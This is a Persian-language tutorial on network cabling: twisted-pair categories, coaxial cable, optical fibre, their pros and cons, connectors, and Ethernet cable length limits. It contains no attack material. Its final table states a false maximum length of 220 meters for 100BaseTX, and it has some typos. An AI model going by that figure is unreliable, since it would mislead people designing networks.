متداولترين نوع کابلی که در انتقال اطلاعات استفاده می گردد ، کابل های بهم تابيده می باشند. اين نوع کابل ها دارای دو رشته سيم به هم پيچيده بوده که هر دو نسبت زمين دارای يک امپدانش يکسان می باشند. بدين ترتيب امکان تاثير پذيری اين نوع کابل ها از کابل های مجاور و يا ساير منابع خارجی کاهش خواهد يافت . کابل های بهم تابيده دارای دو مدل متفاوت : Shielded ( روکش دار ) و Unshielded ( بدون روکش ) می باشند. کابل UTP نسبت به کابل STP بمراتب متداول تر بوده و در اکثر شبکه های محلی استفاده می گردد.کيفيت کابل های UTP متغير بوده و از کابل های معمولی استفاده شده برای تلفن تا کابل های با سرعت بالا را شامل می گردد. کابل دارای چهار زوج سيم بوده و درون يک روکش قرار می گيرند. هر زوج با تعداد مشخصی پيچ تابانده شده ( در واحد اينچ ) تا تاثير پذيری آن از ساير زوج ها و ياساير دستگاههای الکتريکی کاهش يابد.

 

کابل های UTP دارای استانداردهای متعددی بوده که در گروههای (Categories) متفاوت زير تقسيم شده اند:

 

Type	کاربرد
Cat 1	فقط صوت ( کابل های تلفن )
Cat 2	داده با سرعت 4 مگابيت در ثانيه
Cat 3	داده با سرعت 10 مگابيت در ثانيه
Cat 4	داده با سرعت 20 مگابيت در ثانيه
Cat 5	داده با سرعت 100 مگابيت در ثانيه

مزايای کابل های بهم تابيده :

• § سادگی و نصب آسان
• § انعطاف پذيری مناسب
• § دارای وزن کم بوده و براحتی بهم تابيده می گردند.

معايب کابل های بهم تابيده :

• § تضعيف فرکانس
• § بدون استفاده از تکرارکننده ها ، قادر به حمل سيگنال در مسافت های طولانی نمی باشند.
• § پايين بودن پهنای باند
• § بدليل پذيرش پارازيت در محيط های الکتريکی سنگين بخدمت گرفته نمی شوند.

کانکتور استاندارد برای کابل های UTP ، از نوع RJ-45 می باشد. کانکتور فوق شباهت زيادی به کانکتورهای تلفن (RJ-11) دارد. هر يک از پين های کانکتور فوق می بايست بدرستی پيکربندی گردند. (RJ:Registered Jack)

 

 

- کابل کواکسيال

يکی از مهمترين محيط های انتقال در مخابرات کابل کواکسيال و يا هم محور می باشد . اين نوع کابل ها از سال 1936 برای انتقال اخبار و اطلاعات در دنيار به کار گرفته شده اند. در اين نوع کابل ها، دو سيم تشکيل دهنده يک زوج ، از حالت متقارن خارج شده و هر زوج از يک سيم در مغز و يک لايه مسی بافته شده در اطراف آن تشکيل می گردد. در نوع ديگر کابل های کواکسيال ، به حای لايه مسی بافته شده ، از تيوپ مسی استوانه ای استفاده می شود. ماده ای پلاستيکی اين دو هادی را از يکديگر جدا می کند. ماده پلاستيکی ممکن است بصورت ديسکهای پلاستيکی يا شيشه ای در فواصل مختلف استفاده و مانع از تماس دو هادی با يکديگر شود و يا ممکن است دو هادی در تمام طول کابل بوسيله مواد پلاستيکی از يکديگر جدا گردند.

 

مزايای کابل های کواکسيال :

• § قابليت اعتماد بالا
• § ظرفيت بالای انتقال ، حداکثر پهنای باند 300 مگاهرتز
• § دوام و پايداری خوب
• § پايطن بودن مخارج نگهداری
• § قابل استفاده در سيستم های آنالوگ و ديجيتال
• § هزينه پائين در زمان توسعه
• § پهنای باند نسبتا" وسيع که مورد استفاده اکثر سرويس های مخابراتی از جمله تله کنفرانس صوتی و تصويری است .

معايب کابل های کواکسيال :

• § مخارج بالای نصب
• § نصب مشکل تر نسبت به کابل های بهم تابيده
• § محدوديت فاصله
• § نياز به استفاده از عناصر خاص برای انشعابات

از کانکتورهای BNC)Bayone -Neill - Concelman) بهمراه کابل های کواکسيال استفاده می گردد. اغلب کارت های شبکه دارای کانکتورهای لازم در اين خصوص می باشند.

 

- فيبر نوری

يکی از جديدترين محيط های انتقال در شبکه های کامپيوتری ، فيبر نوری است . فيبر نوری از يک ميله استوانه ای که هسته ناميده می شود و جنس آن از سيليکات است تشکيل می گردد. شعاع استوانه بين دو تا سه ميکرون است . روی هسته ، استوانه ديگری ( از همان جنس هسته ) که غلاف ناميده می شود ، استقرار می يابد. ضريب شکست هسته را با M1 و ضريب شکست غلاف را با M2 نشان داده و همواره M1>M2 است . در اين نوع فيبرها ، نور در اثر انعکاسات کلی در فصل مشترک هسته و غلاف ، انتشار پيدا خواهد کرد. منابع نوری در اين نوع کابل ها ، ديود ليزری و يا ديودهای ساطع کننده نور می باشند.منابع فوق ، سيگنال های الکتريکی را به نور تبديل می نمايند.

 

مزايای فيبر نوری :

• § حجم و وزن کم
• § پهنای باند بالا
• § تلفات سيگنال کم و در نتيجه فاصله تقويت کننده ها زياد می گردد.
• § فراوانی مواد تشکيل دهنده آنها
• § مصون بودن از اثرات القاهای الکترو معناطيسی مدارات ديگر
• § آتش زا نبودن آنها بدليل عدم وجود پالس الکتريکی در آنها
• § مصون بودن در مقابل عوامل جوی و رطوبت
• § سهولت در امر کابل کشی و نصب
• § استفاده در شبکه های مخابراتی آنالوگ و ديجيتال
• § مصونيت در مقابل پارازيت

معايب فيبر نوری :

• § براحتی شکسته شده و می بايست دارای يک پوشش مناسب باشند. مسئله فوق با ظهور فيبر های تمام پلاستيکی و پلاستيکی / شيشه ای کاهش پيدا کرده است .
• § اتصال دو بخش از فيبر يا اتصال يک منبع نور به فيبر ، فرآيند دشواری است . در چنين حالتی می توان از فيبرهای ضخيم تر استفاده کرد اما اين مسئله باعث تلفات زياد و کم شدن پهنای باند می گردد.
• § از اتصالات T شکل در فيبر نوری نمی توان جهت گرفتن انشهاب استفاده نمود. در چنين حالتی فيبر می بايست بريده شده و يک Detector اضافه گردد. دستگاه فوفق می بايست قادر به دريافت و تکرار سيگنال را داشته باشد.
• § تقويت سيگنال نوری يکی از مشکلات اساسی در زمينه فيبر نوری است . برای تقويت سيگنال می بايست سيگنال های توری به سيگنال های الکتريکی تبديل ، تقويت و مجددا" به علائم نوری تبديل شوند.

کابل های استفاده شده در شبکه های اترنت

Specification	Cable Type	Maximum length
10BaseT	Unshielded Twisted Pair	100 meters
10Base2	Thin Coaxial	185 meters
10Base5	Thick Coaxial	500 meters
10BaseF	Fiber Optic	2000 meters
100BaseT	Unshielded Twisted Pair	100 meters
100BaseTX	Unshielded Twisted Pair	220 meters